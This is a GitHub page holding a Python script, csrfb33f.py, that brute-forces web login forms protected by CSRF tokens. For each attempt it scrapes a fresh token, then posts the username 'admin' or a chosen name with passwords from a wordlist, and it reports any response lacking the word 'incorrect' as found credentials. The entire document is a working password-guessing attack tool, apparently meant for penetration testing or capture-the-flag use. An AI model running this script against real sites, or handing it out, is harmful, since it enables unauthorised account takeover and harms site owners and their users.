-
Notifications
You must be signed in to change notification settings - Fork 1
/
csrfb33f.py
73 lines (62 loc) · 2.53 KB
/
csrfb33f.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
#!/usr/bin/python3
import sys
import signal
import requests
import argparse
import textwrap
import threading
from bs4 import BeautifulSoup
parser = argparse.ArgumentParser(
prog='csrfb33f.py',
formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent('''\
-------------------------------------------------------------
------------ | Brute-force CSRF |----------------------------
-------------------------------------------------------------
__ _ _____ _____ __
/ _| | |____ ||____ |/ _|
___ ___ _ __| |_| |__ / / / / |_
/ __/ __| '__| _| '_ \ \ \ \ \ _|
| (__\__ \ | | | | |_) |.___/ /.___/ / |
\___|___/_| |_| |_.__/ \____/ \____/|_|
V 0.1
by h4rith.com
-------------------------------------------------------------'''),
usage='python3 %(prog)s -u [url] -w [wordlist] -c [token-name]',
epilog='---------------- Script from h4rithd.com ----------------')
parser._action_groups.pop()
required = parser.add_argument_group('[!] Required arguments')
optional = parser.add_argument_group('[!] Optional arguments')
required.add_argument('-u','--url', metavar='', required=True, help='Target URL')
required.add_argument('-w','--wordlist', metavar='', required=True, help='Wordlist path')
required.add_argument('-c','--token', metavar='', required=True, help='CSRF token name')
optional.add_argument('-user','--username', metavar='',help='Username')
args = parser.parse_args()
if args.username is not None:
user = args.username
else:
user = 'admin'
s = requests.session()
def sendRequests(username, password):
page = s.get(args.url)
soup = BeautifulSoup(page.content, 'html.parser')
token = soup.find('input', attrs = { 'name' : args.token })['value']
data = { 'username' : username, # Change this
'password' : password, # Change this
'submit' : 'submit', # Change this
args.token : token }
response = s.post(args.url, data = data)
if 'incorrect' not in response.text:
print("\n"+"-"*75+"\n\t\t[+] Credentials found !! {}:{}".format(username, password)+"\n"+"-"*75)
sys.exit()
def run():
with open(args.wordlist) as wordlist:
for word in wordlist:
password = word.rstrip()
print("[*] Trying {}:{}".format(user,password), flush=True)
sys.stdout.flush()
sendRequests(user,password)
if __name__ == '__main__':
signal.signal(signal.SIGINT, quit)
run_thread = threading.Thread(target=run)
run_thread.start()